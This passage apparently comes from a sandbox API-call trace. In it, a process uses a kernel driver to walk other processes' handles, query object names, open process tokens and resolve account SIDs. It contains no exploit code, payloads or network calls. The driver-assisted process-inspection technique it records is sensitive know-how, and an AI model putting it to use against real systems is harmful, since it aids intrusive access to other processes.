(Object=0xfffffa800318d860) returned 0x1 [0227.468] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.468] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.468] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0227.468] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.468] PsAcquireProcessExitSynchronization () returned 0x0 [0227.468] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0) [0227.468] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ee3f20, HandleInformation=0x0) returned 0x0 [0227.468] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.468] PsReleaseProcessExitSynchronization () returned 0x2 [0227.468] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0227.468] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.468] ObfDereferenceObject (Object=0xfffffa8001ee3f20) returned 0x1 [0227.468] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.468] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.468] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0227.468] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.469] PsAcquireProcessExitSynchronization () returned 0x0 [0227.469] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0) [0227.469] ObReferenceObjectByHandle (in: Handle=0x70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0227.469] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.469] PsReleaseProcessExitSynchronization () returned 0x2 [0227.469] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0227.469] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.469] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0227.469] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.469] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.469] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0227.469] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.469] PsAcquireProcessExitSynchronization () returned 0x0 [0227.469] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0) [0227.469] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0227.469] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.469] PsReleaseProcessExitSynchronization () returned 0x2 [0227.469] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0227.469] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.469] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0227.469] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.469] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.469] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.469] PsLookupProcessByProcessId (in: ProcessId=0xa64, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.469] PsAcquireProcessExitSynchronization () returned 0x0 [0227.469] KeStackAttachProcess (in: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317b060, ApcState=0xfffff880052b35d0) [0227.470] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0227.470] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.470] PsReleaseProcessExitSynchronization () returned 0x2 [0227.470] ObfDereferenceObject (Object=0xfffffa800317b060) returned 0x31 [0227.470] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.470] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0227.470] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.470] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaec) returned 0xc8 [0227.470] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.470] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800312b730, HandleInformation=0x0) returned 0x0 [0227.470] ObOpenObjectByPointer (in: Object=0xfffffa800312b730, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.470] ObfDereferenceObject (Object=0xfffffa800312b730) returned 0x14 [0227.470] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.470] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.470] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.470] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.470] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.472] CloseHandle (hObject=0xc4) returned 1 [0227.472] CloseHandle (hObject=0xc8) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.472] PsLookupProcessByProcessId (in: ProcessId=0xaec, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.472] PsAcquireProcessExitSynchronization () returned 0x0 [0227.472] KeStackAttachProcess (in: PROCESS=0xfffffa800312b730, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800312b730, ApcState=0xfffff880052b35d0) [0227.472] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003149960, HandleInformation=0x0) returned 0x0 [0227.472] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.472] PsReleaseProcessExitSynchronization () returned 0x2 [0227.472] ObfDereferenceObject (Object=0xfffffa800312b730) returned 0x12 [0227.472] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.472] ObfDereferenceObject (Object=0xfffffa8003149960) returned 0x1 [0227.472] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.472] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.472] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.472] PsLookupProcessByProcessId (in: ProcessId=0xaec, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.473] PsAcquireProcessExitSynchronization () returned 0x0 [0227.473] KeStackAttachProcess (in: PROCESS=0xfffffa800312b730, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800312b730, ApcState=0xfffff880052b35d0) [0227.473] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003149810, HandleInformation=0x0) returned 0x0 [0227.473] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.473] PsReleaseProcessExitSynchronization () returned 0x2 [0227.473] ObfDereferenceObject (Object=0xfffffa800312b730) returned 0x12 [0227.473] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.473] ObfDereferenceObject (Object=0xfffffa8003149810) returned 0x1 [0227.473] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.473] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x614) returned 0xc8 [0227.473] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.473] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003176060, HandleInformation=0x0) returned 0x0 [0227.473] ObOpenObjectByPointer (in: Object=0xfffffa8003176060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.473] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x26 [0227.473] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.473] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.473] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.473] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.473] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.475] CloseHandle (hObject=0xc4) returned 1 [0227.475] CloseHandle (hObject=0xc8) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.475] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.475] PsAcquireProcessExitSynchronization () returned 0x0 [0227.475] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.475] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800290d920, HandleInformation=0x0) returned 0x0 [0227.475] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.475] PsReleaseProcessExitSynchronization () returned 0x2 [0227.475] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.475] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.475] ObfDereferenceObject (Object=0xfffffa800290d920) returned 0x1 [0227.475] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.475] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0227.475] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.476] PsAcquireProcessExitSynchronization () returned 0x0 [0227.476] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.476] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002632070, HandleInformation=0x0) returned 0x0 [0227.476] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.476] PsReleaseProcessExitSynchronization () returned 0x2 [0227.476] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.476] ObQueryNameString (in: Object=0xfffffa8002632070, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.476] ObfDereferenceObject (Object=0xfffffa8002632070) returned 0x1 [0227.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.476] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.476] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.476] PsAcquireProcessExitSynchronization () returned 0x0 [0227.476] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.476] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0227.476] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.476] PsReleaseProcessExitSynchronization () returned 0x2 [0227.476] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.476] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.476] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0227.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.476] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0227.476] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.476] PsAcquireProcessExitSynchronization () returned 0x0 [0227.477] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.477] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003096370, HandleInformation=0x0) returned 0x0 [0227.477] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.477] PsReleaseProcessExitSynchronization () returned 0x2 [0227.477] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.477] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.477] ObfDereferenceObject (Object=0xfffffa8003096370) returned 0x1 [0227.477] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.477] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.477] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.477] PsAcquireProcessExitSynchronization () returned 0x0 [0227.477] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.477] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a002054e20, HandleInformation=0x0) returned 0x0 [0227.477] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.477] PsReleaseProcessExitSynchronization () returned 0x2 [0227.477] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.477] ObQueryNameString (in: Object=0xfffff8a002054e20, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.477] ObfDereferenceObject (Object=0xfffff8a002054e20) returned 0x1 [0227.477] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.477] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.477] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0227.478] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.478] PsAcquireProcessExitSynchronization () returned 0x0 [0227.478] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.478] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003098e60, HandleInformation=0x0) returned 0x0 [0227.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.478] PsReleaseProcessExitSynchronization () returned 0x2 [0227.478] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.478] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.478] ObfDereferenceObject (Object=0xfffffa8003098e60) returned 0x1 [0227.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.478] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.478] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.478] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.478] PsAcquireProcessExitSynchronization () returned 0x0 [0227.478] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0227.478] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0227.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.478] PsReleaseProcessExitSynchronization () returned 0x2 [0227.478] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x24 [0227.478] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, 